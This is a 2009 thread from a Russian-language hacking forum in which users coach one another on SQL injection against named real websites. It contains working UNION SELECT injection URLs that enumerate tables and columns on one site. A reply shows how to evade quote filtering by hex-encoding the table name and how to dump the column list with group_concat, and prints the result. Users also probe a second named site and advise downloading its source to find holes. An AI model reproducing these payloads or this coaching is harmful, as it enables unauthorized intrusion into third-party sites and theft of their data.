ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
22.09.2009, 16:49
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Сообщение от Grey
Единственная накладка - в выборке с лимитом нужна запятая, но можно обойтись, к примеру этим where id = 1 и т.д.
Там можно и без запятой, пример: LMIT 1 OFFSET 1
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
22.09.2009, 21:10
|
|
Новичок
Регистрация: 22.09.2009
Сообщений: 1
Провел на форуме:
2964
Репутация:
0
|
|
Добрый день уважаемые гуру, вот занялся изучением SQL-инъекций, не могу разобраться:
Делаю инъекции для определения имен таблиц:
Код:
http://www.marlin-yug.com/shownews.php?news_id=-32+union+select+1,2,TABLE_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+4,1
Все работает, перебирая limit нашел интересную табличку guest_book
Делаю так, чтоб узнать колонки:
Код:
http://www.marlin-yug.com/shownews.php?news_id=-32+union+select+1,2,COLUMN_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='guest_book'+LIMIT+1,1
НЕ работает !
Код:
Select_Error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'guest_book\' LIMIT 1,1' at line 5SELECT `mar_news`.`news_date`, `mar_news`.`news_small_en`, `mar_news`.`news_big_en`, `mar_news`.`photo_alb_page_id`,`mar_news`.`file_en`,`mar_news`.`file_anchor_en`, `mar_news`.`category_name_id` FROM `mar_news` WHERE `mar_news`.`news_id` = -32 union select 1,2,COLUMN_NAME,4,5,6,7 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=\'guest_book\' LIMIT 1,1
Подскажите пожалуйста в чем загвоздка.
Последний раз редактировалось неумейка; 22.09.2009 в 21:12..
|
|
|
|
22.09.2009, 21:14
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
WHERE+TABLE_NAME=guest_book
Без '
Там же видно в чём ошибка.
|
|
|
|
22.09.2009, 23:19
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
Вообще то WHERE+TABLE_NAME=0x67756573745f626f6f6b, так как фильтруются кавычки, нужно либо хексить, либо чарить.
Код:
http://www.marlin-yug.com/shownews.php?news_id=-32+union+select+1,2,COLUMN_NAME,4,5,6,7+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x67756573745f626f6f6b+LIMIT+1,1
Ну и для удобства вот так:
Код:
http://www.marlin-yug.com/shownews.php?news_id=-32+union+select+1,2,group_concat(COLUMN_NAME),4,5,6,7+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x67756573745f626f6f6b--+
Получаем:
Код:
guest_book_id,gb_name,gb_email,gb_date,gb_text,gb_lang
Последний раз редактировалось Ins3t; 22.09.2009 в 23:38..
|
|
|
|
23.09.2009, 00:09
|
|
Новичок
Регистрация: 10.08.2009
Сообщений: 11
Провел на форуме:
202027
Репутация:
37
|
|
Вот столкнулся, что и как дальше незнаю и можно ли из этого что то получить:
http://sk-kr.ru/
далее:
http://sk-kr.ru/index.php?id=2&cid=2
подставляя ' в любой из параметров получаем чистый экран, по запросу :
http://sk-kr.ru/index.php?id=2
получаем:
« MODx Parse Error »MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
PHP error debug
Error: mysql_fetch_array(): supplied argument is not a valid MySQL result resource
Error type/ Nr.: Warning - 2
File: /home/b/bz23region/public_html/manager/includes/document.parser.class.inc.php(769) : eval()'d code
Line: 7
Parser timing
MySQL: 0.0058 s (23 Requests)
PHP: 0.0198 s
Total: 0.0256 s
собсно, можно ли провести инъекцию ? |
|
|
|
23.09.2009, 00:18
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691
Репутация:
330
|
|
собстно нет.
http://sk-kr.ru/index.php?id=2
Здесб баг в самом скрипте, вы не вызываете ошибку, она вызвана каким то драгим фактором.
|
|
|
|
23.09.2009, 00:35
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
экранирование кавычек
использую char(), hex() и тп
|
|
|
|
23.09.2009, 00:52
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от ph4nt0m
собсно, можно ли провести инъекцию ?
Нету в модексе скулей. Точнее есть, но как-бэ нет  Во всяком случае в последнем.
В этих параметрах можешь даже и не пробовать
Последний раз редактировалось jokester; 23.09.2009 в 00:55..
|
|
|
|
23.09.2009, 01:01
|
|
Новичок
Регистрация: 10.08.2009
Сообщений: 11
Провел на форуме:
202027
Репутация:
37
|
|
Сообщение от jokester
Нету в модексе скулей. Точнее есть, но как-бэ нет Во всяком случае в последнем.
В этих параметрах можешь даже и не пробовать спасибо, покопаюсь дальше, надеюсь найду тайную дверцу в чрево сайта...
ведь я правильно понял : Точнее есть, но как-бэ нет что дырка есть но не в этом параметре, теперь буду пробовать из спортивного интереса.
|
|
|
|
23.09.2009, 01:05
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от ph4nt0m
спасибо, покопаюсь дальше, надеюсь найду тайную дверцу в чрево сайта...
ведь я правильно понял : Точнее есть, но как-бэ нет что дырка есть но не в этом параметре, теперь буду пробовать из спортивного интереса.
В таком случае рекоммендую скачать код. Просто так, удалённо замучаешься и врятли найдёшь.
Хотя эта версия не последняя, про неё точно сказать не могу
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
